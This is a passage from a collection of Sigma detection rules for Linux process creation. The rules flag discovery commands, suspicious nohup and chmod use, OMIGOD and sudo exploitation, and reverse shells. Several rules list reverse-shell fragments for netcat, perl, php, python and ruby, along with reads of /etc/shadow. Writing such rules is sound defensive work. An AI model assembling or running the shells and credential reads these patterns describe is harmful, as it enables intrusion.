29 | - '/etc/shadow' 30 | - '/etc/sudoers' 31 | selection_4: 32 | Image|endswith: '/id' 33 | selection_5: 34 | Image|endswith: '/lsof' 35 | CommandLine|contains: '-u' 36 | condition: 1 of selection* 37 | falsepositives: 38 | - Legitimate administration activities 39 | level: low 40 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_local_groups.yml: -------------------------------------------------------------------------------- 1 | title: Local Groups Discovery - Linux 2 | id: 676381a6-15ca-4d73-a9c8-6a22e970b90d 3 | status: test 4 | description: Detects enumeration of local system groups. Adversaries may attempt to find local system groups and permission settings 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md 7 | author: Ömer Günal, Alejandro Ortuno, oscd.community 8 | date: 2020/10/11 9 | modified: 2022/11/27 10 | tags: 11 | - attack.discovery 12 | - attack.t1069.001 13 | logsource: 14 | category: process_creation 15 | product: linux 16 | detection: 17 | selection_1: 18 | Image|endswith: '/groups' 19 | selection_2: 20 | Image|endswith: 21 | - '/cat' 22 | - '/head' 23 | - '/tail' 24 | - '/more' 25 | CommandLine|contains: '/etc/group' 26 | condition: 1 of selection* 27 | falsepositives: 28 | - Legitimate administration activities 29 | level: low 30 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_malware_gobrat_grep_payload_discovery.yml: -------------------------------------------------------------------------------- 1 | title: Potential GobRAT File Discovery Via Grep 2 | id: e34cfa0c-0a50-4210-9cb3-5632d08eb041 3 | status: experimental 4 | description: Detects the use of grep to discover specific files created by the GobRAT malware 5 | references: 6 | - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html 7 | - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection 8 | - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection 9 | author: Joseliyo Sanchez, @Joseliyo_Jstnk 10 | date: 2023/06/02 11 | tags: 12 | - attack.discovery 13 | - attack.t1082 14 | logsource: 15 | category: process_creation 16 | product: linux 17 | detection: 18 | selection: 19 | Image|endswith: '/grep' 20 | CommandLine|contains: 21 | - 'apached' 22 | - 'frpc' 23 | - 'sshd.sh' 24 | - 'zone.arm' 25 | condition: selection 26 | falsepositives: 27 | - Unknown 28 | level: high 29 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_mkfifo_named_pipe_creation.yml: -------------------------------------------------------------------------------- 1 | title: Named Pipe Created Via Mkfifo 2 | id: 9d779ce8-5256-4b13-8b6f-b91c602b43f4 3 | status: experimental 4 | description: Detects the creation of a new named pipe using the "mkfifo" utility 5 | references: 6 | - https://dev.to/0xbf/use-mkfifo-to-create-named-pipe-linux-tips-5bbk 7 | - https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally 8 | author: Nasreddine Bencherchali (Nextron Systems) 9 | date: 2023/06/16 10 | tags: 11 | - attack.execution 12 | logsource: 13 | category: process_creation 14 | product: linux 15 | detection: 16 | selection: 17 | Image|endswith: '/mkfifo' 18 | condition: selection 19 | falsepositives: 20 | - Unknown 21 | level: low 22 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_mkfifo_named_pipe_creation_susp_location.yml: -------------------------------------------------------------------------------- 1 | title: Potentially Suspicious Named Pipe Created Via Mkfifo 2 | id: 999c3b12-0a8c-40b6-8e13-dd7d62b75c7a 3 | related: 4 | - id: 9d779ce8-5256-4b13-8b6f-b91c602b43f4 5 | type: derived 6 | status: experimental 7 | description: Detects the creation of a new named pipe using the "mkfifo" utility in a potentially suspicious location 8 | references: 9 | - https://dev.to/0xbf/use-mkfifo-to-create-named-pipe-linux-tips-5bbk 10 | - https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally 11 | author: Nasreddine Bencherchali (Nextron Systems) 12 | date: 2023/06/16 13 | tags: 14 | - attack.execution 15 | logsource: 16 | category: process_creation 17 | product: linux 18 | detection: 19 | selection: 20 | Image|endswith: '/mkfifo' 21 | # Note: Add more potentially suspicious locations 22 | CommandLine|contains: ' /tmp/' 23 | condition: selection 24 | falsepositives: 25 | - Unknown 26 | level: medium 27 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_mount_hidepid.yml: -------------------------------------------------------------------------------- 1 | title: Mount Execution With Hidepid Parameter 2 | id: ec52985a-d024-41e3-8ff6-14169039a0b3 3 | status: experimental 4 | description: Detects execution of the "mount" command with "hidepid" parameter to make invisible processes to other users from the system 5 | references: 6 | - https://blogs.blackberry.com/ 7 | - https://www.cyberciti.biz/faq/linux-hide-processes-from-other-users/ 8 | - https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144 9 | author: Joseliyo Sanchez, @Joseliyo_Jstnk 10 | date: 2023/01/12 11 | tags: 12 | - attack.credential_access 13 | - attack.t1564 14 | logsource: 15 | product: linux 16 | category: process_creation 17 | detection: 18 | selection: 19 | Image|endswith: '/mount' 20 | CommandLine|contains|all: 21 | - 'hidepid=2' 22 | - ' -o ' 23 | condition: selection 24 | falsepositives: 25 | - Unknown 26 | level: medium 27 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_netcat_reverse_shell.yml: -------------------------------------------------------------------------------- 1 | title: Potential Netcat Reverse Shell Execution 2 | id: 7f734ed0-4f47-46c0-837f-6ee62505abd9 3 | status: experimental 4 | description: Detects execution of netcat with the "-e" flag followed by common shells. This could be a sign of a potential reverse shell setup. 5 | references: 6 | - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet 7 | - https://www.revshells.com/ 8 | - https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/ 9 | - https://www.infosecademy.com/netcat-reverse-shells/ 10 | - https://man7.org/linux/man-pages/man1/ncat.1.html 11 | author: '@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)' 12 | date: 2023/04/07 13 | tags: 14 | - attack.execution 15 | - attack.t1059 16 | logsource: 17 | category: process_creation 18 | product: linux 19 | detection: 20 | selection_nc: 21 | Image|endswith: 22 | - '/nc' 23 | - '/ncat' 24 | selection_flags: 25 | CommandLine|contains: 26 | - ' -c ' 27 | - ' -e ' 28 | selection_shell: 29 | CommandLine|contains: 30 | - ' ash' 31 | - ' bash' 32 | - ' bsh' 33 | - ' csh' 34 | - ' ksh' 35 | - ' pdksh' 36 | - ' sh' 37 | - ' tcsh' 38 | - '/bin/ash' 39 | - '/bin/bash' 40 | - '/bin/bsh' 41 | - '/bin/csh' 42 | - '/bin/ksh' 43 | - '/bin/pdksh' 44 | - '/bin/sh' 45 | - '/bin/tcsh' 46 | - '/bin/zsh' 47 | - '$IFSash' 48 | - '$IFSbash' 49 | - '$IFSbsh' 50 | - '$IFScsh' 51 | - '$IFSksh' 52 | - '$IFSpdksh' 53 | - '$IFSsh' 54 | - '$IFStcsh' 55 | - '$IFSzsh' 56 | condition: all of selection_* 57 | falsepositives: 58 | - Unlikely 59 | level: high 60 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_nohup.yml: -------------------------------------------------------------------------------- 1 | title: Nohup Execution 2 | id: e4ffe466-6ff8-48d4-94bd-e32d1a6061e2 3 | status: test 4 | description: Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments 5 | references: 6 | - https://gtfobins.github.io/gtfobins/nohup/ 7 | - https://en.wikipedia.org/wiki/Nohup 8 | - https://www.computerhope.com/unix/unohup.htm 9 | author: 'Christopher Peacock @SecurePeacock, SCYTHE @scythe_io' 10 | date: 2022/06/06 11 | tags: 12 | - attack.execution 13 | - attack.t1059.004 14 | logsource: 15 | product: linux 16 | category: process_creation 17 | detection: 18 | selection: 19 | Image|endswith: '/nohup' 20 | condition: selection 21 | falsepositives: 22 | - Administrators or installed processes that leverage nohup 23 | level: medium 24 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_nohup_susp_execution.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious Nohup Execution 2 | id: 457df417-8b9d-4912-85f3-9dbda39c3645 3 | related: 4 | - id: e4ffe466-6ff8-48d4-94bd-e32d1a6061e2 5 | type: derived 6 | status: experimental 7 | description: Detects execution of binaries located in potentially suspicious locations via "nohup" 8 | references: 9 | - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html 10 | - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/ 11 | - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection 12 | - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection 13 | author: Joseliyo Sanchez, @Joseliyo_Jstnk 14 | date: 2023/06/02 15 | tags: 16 | - attack.execution 17 | logsource: 18 | product: linux 19 | category: process_creation 20 | detection: 21 | selection: 22 | Image|endswith: '/nohup' 23 | CommandLine|contains: '/tmp/' 24 | condition: selection 25 | falsepositives: 26 | - Unknown 27 | level: high 28 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executescript.yml: -------------------------------------------------------------------------------- 1 | title: OMIGOD SCX RunAsProvider ExecuteScript 2 | id: 6eea1bf6-f8d2-488a-a742-e6ef6c1b67db 3 | status: test 4 | description: | 5 | Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. 6 | Script being executed gets created as a temp file in /tmp folder with a scx* prefix. 7 | Then it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/. 8 | The file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including 9 | Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite. 10 | references: 11 | - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure 12 | - https://github.com/Azure/Azure-Sentinel/pull/3059 13 | author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC 14 | date: 2021/10/15 15 | modified: 2022/10/05 16 | tags: 17 | - attack.privilege_escalation 18 | - attack.initial_access 19 | - attack.execution 20 | - attack.t1068 21 | - attack.t1190 22 | - attack.t1203 23 | logsource: 24 | product: linux 25 | category: process_creation 26 | detection: 27 | selection: 28 | User: root 29 | LogonId: 0 30 | CurrentDirectory: '/var/opt/microsoft/scx/tmp' 31 | CommandLine|contains: '/etc/opt/microsoft/scx/conf/tmpdir/scx' 32 | condition: selection 33 | falsepositives: 34 | - Legitimate use of SCX RunAsProvider ExecuteScript. 35 | level: high 36 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml: -------------------------------------------------------------------------------- 1 | title: OMIGOD SCX RunAsProvider ExecuteShellCommand 2 | id: 21541900-27a9-4454-9c4c-3f0a4240344a 3 | status: test 4 | description: | 5 | Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. 6 | SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including 7 | Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite. 8 | references: 9 | - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure 10 | - https://github.com/Azure/Azure-Sentinel/pull/3059 11 | author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC 12 | date: 2021/10/15 13 | modified: 2022/10/05 14 | tags: 15 | - attack.privilege_escalation 16 | - attack.initial_access 17 | - attack.execution 18 | - attack.t1068 19 | - attack.t1190 20 | - attack.t1203 21 | logsource: 22 | product: linux 23 | category: process_creation 24 | detection: 25 | selection: 26 | User: root 27 | LogonId: 0 28 | CurrentDirectory: '/var/opt/microsoft/scx/tmp' 29 | CommandLine|contains: '/bin/sh' 30 | condition: selection 31 | falsepositives: 32 | - Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand. 33 | level: high 34 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_perl_reverse_shell.yml: -------------------------------------------------------------------------------- 1 | title: Potential Perl Reverse Shell Execution 2 | id: 259df6bc-003f-4306-9f54-4ff1a08fa38e 3 | status: experimental 4 | description: Detects execution of the perl binary with the "-e" flag and common strings related to potential reverse shell activity 5 | references: 6 | - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet 7 | - https://www.revshells.com/ 8 | author: '@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)' 9 | date: 2023/04/07 10 | tags: 11 | - attack.execution 12 | logsource: 13 | category: process_creation 14 | product: linux 15 | detection: 16 | selection_img: 17 | Image|endswith: '/perl' 18 | CommandLine|contains: ' -e ' 19 | selection_content: 20 | - CommandLine|contains|all: 21 | - 'fdopen(' 22 | - '::Socket::INET' 23 | - CommandLine|contains|all: 24 | - 'Socket' 25 | - 'connect' 26 | - 'open' 27 | - 'exec' 28 | condition: all of selection_* 29 | falsepositives: 30 | - Unlikely 31 | level: high 32 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_php_reverse_shell.yml: -------------------------------------------------------------------------------- 1 | title: Potential PHP Reverse Shell 2 | id: c6714a24-d7d5-4283-a36b-3ffd091d5f7e 3 | status: experimental 4 | description: | 5 | Detects usage of the PHP CLI with the "-r" flag which allows it to run inline PHP code. The rule looks for calls to the "fsockopen" function which allows the creation of sockets. 6 | Attackers often leverage this in combination with functions such as "exec" or "fopen" to initiate a reverse shell connection. 7 | references: 8 | - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet 9 | - https://www.revshells.com/ 10 | author: '@d4ns4n_' 11 | date: 2023/04/07 12 | tags: 13 | - attack.execution 14 | logsource: 15 | category: process_creation 16 | product: linux 17 | detection: 18 | selection: 19 | Image|contains: '/php' 20 | CommandLine|contains|all: 21 | - ' -r ' 22 | - 'fsockopen' 23 | CommandLine|contains: 24 | - 'ash' 25 | - 'bash' 26 | - 'bsh' 27 | - 'csh' 28 | - 'ksh' 29 | - 'pdksh' 30 | - 'sh' 31 | - 'tcsh' 32 | - 'zsh' 33 | condition: selection 34 | falsepositives: 35 | - Unknown 36 | level: high 37 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_process_discovery.yml: -------------------------------------------------------------------------------- 1 | title: Process Discovery 2 | id: 4e2f5868-08d4-413d-899f-dc2f1508627b 3 | status: stable 4 | description: | 5 | Detects process discovery commands. Adversaries may attempt to get information about running processes on a system. 6 | Information obtained could be used to gain an understanding of common software/applications running on systems within the network 7 | references: 8 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md 9 | author: Ömer Günal, oscd.community 10 | date: 2020/10/06 11 | modified: 2022/07/07 12 | tags: 13 | - attack.discovery 14 | - attack.t1057 15 | logsource: 16 | product: linux 17 | category: process_creation 18 | detection: 19 | selection: 20 | Image|endswith: 21 | - '/ps' 22 | - '/top' 23 | condition: selection 24 | falsepositives: 25 | - Legitimate administration activities 26 | level: informational 27 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_proxy_connection.yml: -------------------------------------------------------------------------------- 1 | title: Connection Proxy 2 | id: 72f4ab3f-787d-495d-a55d-68c2ff46cf4c 3 | status: test 4 | description: Detects setting proxy configuration 5 | references: 6 | - https://attack.mitre.org/techniques/T1090/ 7 | author: Ömer Günal 8 | date: 2020/06/17 9 | modified: 2022/10/05 10 | tags: 11 | - attack.defense_evasion 12 | - attack.t1090 13 | logsource: 14 | product: linux 15 | category: process_creation 16 | detection: 17 | selection: 18 | CommandLine|contains: 19 | - 'http_proxy=' 20 | - 'https_proxy=' 21 | condition: selection 22 | falsepositives: 23 | - Legitimate administration activities 24 | level: low 25 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml: -------------------------------------------------------------------------------- 1 | title: Python Spawning Pretty TTY 2 | id: c4042d54-110d-45dd-a0e1-05c47822c937 3 | related: 4 | - id: 32e62bc7-3de0-4bb1-90af-532978fe42c0 5 | type: similar 6 | status: experimental 7 | description: Detects python spawning a pretty tty which could be indicative of potential reverse shell activity 8 | references: 9 | - https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/ 10 | author: Nextron Systems 11 | date: 2022/06/03 12 | modified: 2023/06/16 13 | tags: 14 | - attack.execution 15 | - attack.t1059 16 | logsource: 17 | category: process_creation 18 | product: linux 19 | detection: 20 | selection_img: 21 | - Image|endswith: 22 | - '/python' 23 | - '/python2' 24 | - '/python3' 25 | - Image|contains: 26 | - '/python2.' # python image is always of the form ../python3.10; ../python is just a symlink 27 | - '/python3.' 28 | selection_cli_1: 29 | CommandLine|contains|all: 30 | - 'import pty' 31 | - '.spawn(' 32 | selection_cli_2: 33 | CommandLine|contains: 'from pty import spawn' 34 | condition: selection_img and 1 of selection_cli_* 35 | falsepositives: 36 | - Unknown 37 | level: high 38 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_python_reverse_shell.yml: -------------------------------------------------------------------------------- 1 | title: Potential Python Reverse Shell 2 | id: 32e62bc7-3de0-4bb1-90af-532978fe42c0 3 | related: 4 | - id: c4042d54-110d-45dd-a0e1-05c47822c937 5 | type: similar 6 | status: experimental 7 | description: Detects executing python with keywords related to network activity that could indicate a potential reverse shell 8 | references: 9 | - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet 10 | - https://www.revshells.com/ 11 | author: '@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)' 12 | date: 2023/04/24 13 | tags: 14 | - attack.execution 15 | logsource: 16 | category: process_creation 17 | product: linux 18 | detection: 19 | selection: 20 | Image|contains: 'python' 21 | CommandLine|contains|all: 22 | - ' -c ' 23 | - 'import' 24 | - 'pty' 25 | - 'spawn(' 26 | - '.connect' 27 | condition: selection 28 | falsepositives: 29 | - Unknown 30 | level: high 31 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_remote_system_discovery.yml: -------------------------------------------------------------------------------- 1 | title: Linux Remote System Discovery 2 | id: 11063ec2-de63-4153-935e-b1a8b9e616f1 3 | status: test 4 | description: Detects the enumeration of other remote systems. 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md 7 | author: Alejandro Ortuno, oscd.community 8 | date: 2020/10/22 9 | modified: 2021/11/27 10 | tags: 11 | - attack.discovery 12 | - attack.t1018 13 | logsource: 14 | category: process_creation 15 | product: linux 16 | detection: 17 | selection_1: 18 | Image|endswith: '/arp' 19 | CommandLine|contains: '-a' 20 | selection_2: 21 | Image|endswith: '/ping' 22 | CommandLine|contains: 23 | - ' 10.' # 10.0.0.0/8 24 | - ' 192.168.' # 192.168.0.0/16 25 | - ' 172.16.' # 172.16.0.0/12 26 | - ' 172.17.' 27 | - ' 172.18.' 28 | - ' 172.19.' 29 | - ' 172.20.' 30 | - ' 172.21.' 31 | - ' 172.22.' 32 | - ' 172.23.' 33 | - ' 172.24.' 34 | - ' 172.25.' 35 | - ' 172.26.' 36 | - ' 172.27.' 37 | - ' 172.28.' 38 | - ' 172.29.' 39 | - ' 172.30.' 40 | - ' 172.31.' 41 | - ' 127.' # 127.0.0.0/8 42 | - ' 169.254.' # 169.254.0.0/16 43 | condition: 1 of selection* 44 | falsepositives: 45 | - Legitimate administration activities 46 | level: low 47 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_remove_package.yml: -------------------------------------------------------------------------------- 1 | title: Linux Package Uninstall 2 | id: 95d61234-7f56-465c-6f2d-b562c6fedbc4 3 | status: experimental 4 | description: Detects linux package removal using builtin tools such as "yum", "apt", "apt-get" or "dpkg". 5 | references: 6 | - https://sysdig.com/blog/mitre-defense-evasion-falco 7 | - https://www.tutorialspoint.com/how-to-install-a-software-on-linux-using-yum-command 8 | - https://linuxhint.com/uninstall_yum_package/ 9 | - https://linuxhint.com/uninstall-debian-packages/ 10 | author: Tuan Le (NCSGroup), Nasreddine Bencherchali (Nextron Systems) 11 | date: 2023/03/09 12 | tags: 13 | - attack.defense_evasion 14 | - attack.t1070 15 | logsource: 16 | product: linux 17 | category: process_creation 18 | detection: 19 | selection_yum: 20 | Image|endswith: '/yum' 21 | CommandLine|contains: 22 | - 'erase' 23 | - 'remove' 24 | selection_apt: 25 | Image|endswith: 26 | - '/apt' 27 | - '/apt-get' 28 | CommandLine|contains: 29 | - 'remove' 30 | - 'purge' 31 | selection_dpkg: 32 | Image|endswith: '/dpkg' 33 | CommandLine|contains: 34 | - '--remove ' 35 | - ' -r ' 36 | selection_rpm: 37 | Image|endswith: '/rpm' 38 | CommandLine|contains: ' -e ' 39 | condition: 1 of selection_* 40 | falsepositives: 41 | - Administrator or administrator scripts might delete packages for several reasons (debugging, troubleshooting). 42 | level: low 43 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_ruby_reverse_shell.yml: -------------------------------------------------------------------------------- 1 | title: Potential Ruby Reverse Shell 2 | id: b8bdac18-c06e-4016-ac30-221553e74f59 3 | status: experimental 4 | description: Detects execution of ruby with the "-e" flag and calls to "socket" related functions. This could be an indication of a potential attempt to setup a reverse shell 5 | references: 6 | - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet 7 | - https://www.revshells.com/ 8 | author: '@d4ns4n_' 9 | date: 2023/04/07 10 | tags: 11 | - attack.execution 12 | logsource: 13 | category: process_creation 14 | product: linux 15 | detection: 16 | selection: 17 | Image|contains: 'ruby' 18 | CommandLine|contains|all: 19 | - ' -e' 20 | - 'rsocket' 21 | - 'TCPSocket' 22 | CommandLine|contains: 23 | - ' ash' 24 | - ' bash' 25 | - ' bsh' 26 | - ' csh' 27 | - ' ksh' 28 | - ' pdksh' 29 | - ' sh' 30 | - ' tcsh' 31 | condition: selection 32 | falsepositives: 33 | - Unknown 34 | level: medium 35 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_schedule_task_job_cron.yml: -------------------------------------------------------------------------------- 1 | title: Scheduled Cron Task/Job - Linux 2 | id: 6b14bac8-3e3a-4324-8109-42f0546a347f 3 | status: test 4 | description: Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder. 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md 7 | author: Alejandro Ortuno, oscd.community 8 | date: 2020/10/06 9 | modified: 2022/11/27 10 | tags: 11 | - attack.execution 12 | - attack.persistence 13 | - attack.privilege_escalation 14 | - attack.t1053.003 15 | logsource: 16 | category: process_creation 17 | product: linux 18 | detection: 19 | selection: 20 | Image|endswith: 'crontab' 21 | CommandLine|contains: '/tmp/' 22 | condition: selection 23 | falsepositives: 24 | - Legitimate administration activities 25 | level: medium 26 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml: -------------------------------------------------------------------------------- 1 | title: Security Software Discovery - Linux 2 | id: c9d8b7fd-78e4-44fe-88f6-599135d46d60 3 | status: test 4 | description: Detects usage of system utilities (only grep and egrep for now) to discover security software discovery 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md 7 | author: Daniil Yugoslavskiy, oscd.community 8 | date: 2020/10/19 9 | modified: 2022/11/27 10 | tags: 11 | - attack.discovery 12 | - attack.t1518.001 13 | logsource: 14 | category: process_creation 15 | product: linux 16 | detection: 17 | selection: 18 | Image|endswith: 19 | # You can add more grep variations such as fgrep, rgrep...etc 20 | - '/grep' 21 | - '/egrep' 22 | CommandLine|contains: 23 | - 'nessusd' # nessus vulnerability scanner 24 | - 'td-agent' # fluentd log shipper 25 | - 'packetbeat' # elastic network logger/shipper 26 | - 'filebeat' # elastic log file shipper 27 | - 'auditbeat' # elastic auditing agent/log shipper 28 | - 'osqueryd' # facebook osquery 29 | - 'cbagentd' # carbon black 30 | - 'falcond' # crowdstrike falcon 31 | condition: selection 32 | falsepositives: 33 | - Legitimate activities 34 | level: low 35 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml: -------------------------------------------------------------------------------- 1 | title: Disable Or Stop Services 2 | id: de25eeb8-3655-4643-ac3a-b662d3f26b6b 3 | status: test 4 | description: Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services 5 | references: 6 | - https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html 7 | author: Nasreddine Bencherchali (Nextron Systems) 8 | date: 2022/09/15 9 | tags: 10 | - attack.defense_evasion 11 | logsource: 12 | category: process_creation 13 | product: linux 14 | detection: 15 | selection: 16 | Image|endswith: 17 | - '/service' 18 | - '/systemctl' 19 | - '/chkconfig' 20 | CommandLine|contains: 21 | - 'stop' 22 | - 'disable' 23 | condition: selection 24 | falsepositives: 25 | - Legitimate administration activities 26 | level: medium 27 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_setgid_setuid.yml: -------------------------------------------------------------------------------- 1 | title: Setuid and Setgid 2 | id: c21c4eaa-ba2e-419a-92b2-8371703cbe21 3 | status: test 4 | description: Detects suspicious change of file privileges with chown and chmod commands 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.001/T1548.001.md 7 | - https://attack.mitre.org/techniques/T1548/001/ 8 | author: Ömer Günal 9 | date: 2020/06/16 10 | modified: 2022/10/05 11 | tags: 12 | - attack.persistence 13 | - attack.t1548.001 14 | logsource: 15 | product: linux 16 | category: process_creation 17 | detection: 18 | selection_root: 19 | CommandLine|contains: 'chown root' 20 | selection_perm: 21 | CommandLine|contains: 22 | - ' chmod u+s' 23 | - ' chmod g+s' 24 | condition: all of selection_* 25 | falsepositives: 26 | - Legitimate administration activities 27 | level: low 28 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_ssm_agent_abuse.yml: -------------------------------------------------------------------------------- 1 | title: Potential Linux Amazon SSM Agent Hijacking 2 | id: f9b3edc5-3322-4fc7-8aa3-245d646cc4b7 3 | status: experimental 4 | description: Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report. 5 | references: 6 | - https://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan 7 | - https://www.bleepingcomputer.com/news/security/amazons-aws-ssm-agent-can-be-used-as-post-exploitation-rat-malware/ 8 | - https://www.helpnetsecurity.com/2023/08/02/aws-instances-attackers-access/ 9 | author: Muhammad Faisal 10 | date: 2023/08/03 11 | tags: 12 | - attack.command_and_control 13 | - attack.persistence 14 | - attack.t1219 15 | logsource: 16 | category: process_creation 17 | product: linux 18 | detection: 19 | selection: 20 | Image|endswith: '/amazon-ssm-agent' 21 | CommandLine|contains|all: 22 | - '-register ' 23 | - '-code ' 24 | - '-id ' 25 | - '-region ' 26 | condition: selection 27 | falsepositives: 28 | - Legitimate activity of system administrators 29 | level: medium 30 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_sudo_cve_2019_14287.yml: -------------------------------------------------------------------------------- 1 | title: Sudo Privilege Escalation CVE-2019-14287 2 | id: f74107df-b6c6-4e80-bf00-4170b658162b 3 | status: test 4 | description: Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287 5 | references: 6 | - https://www.openwall.com/lists/oss-security/2019/10/14/1 7 | - https://access.redhat.com/security/cve/cve-2019-14287 8 | - https://twitter.com/matthieugarin/status/1183970598210412546 9 | author: Florian Roth (Nextron Systems) 10 | date: 2019/10/15 11 | modified: 2022/10/05 12 | tags: 13 | - attack.privilege_escalation 14 | - attack.t1068 15 | - attack.t1548.003 16 | - cve.2019.14287 17 | logsource: 18 | product: linux 19 | category: process_creation 20 | detection: 21 | selection: 22 | CommandLine|contains: ' -u#' 23 | condition: selection 24 | falsepositives: 25 | - Unlikely 26 | level: high 27 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_susp_chmod_directories.yml: -------------------------------------------------------------------------------- 1 | title: Chmod Suspicious Directory 2 | id: 6419afd1-3742-47a5-a7e6-b50386cd15f8 3 | status: test 4 | description: Detects chmod targeting files in abnormal directory paths. 5 | references: 6 | - https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/ 7 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md 8 | author: 'Christopher Peacock @SecurePeacock, SCYTHE @scythe_io' 9 | date: 2022/06/03 10 | tags: 11 | - attack.defense_evasion 12 | - attack.t1222.002 13 | logsource: 14 | product: linux 15 | category: process_creation 16 | detection: 17 | selection: 18 | Image|endswith: '/chmod' 19 | CommandLine|contains: 20 | - '/tmp/' 21 | - '/.Library/' 22 | - '/etc/' 23 | - '/opt/' 24 | condition: selection 25 | falsepositives: 26 | - Admin changing file permissions. 27 | level: medium 28 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_susp_container_residence_discovery.yml: -------------------------------------------------------------------------------- 1 | title: Container Residence Discovery Via Proc Virtual FS 2 | id: 746c86fb-ccda-4816-8997-01386263acc4 3 | status: experimental 4 | description: Detects potential container discovery via listing of certain kernel features in the "/proc" virtual filesystem 5 | references: 6 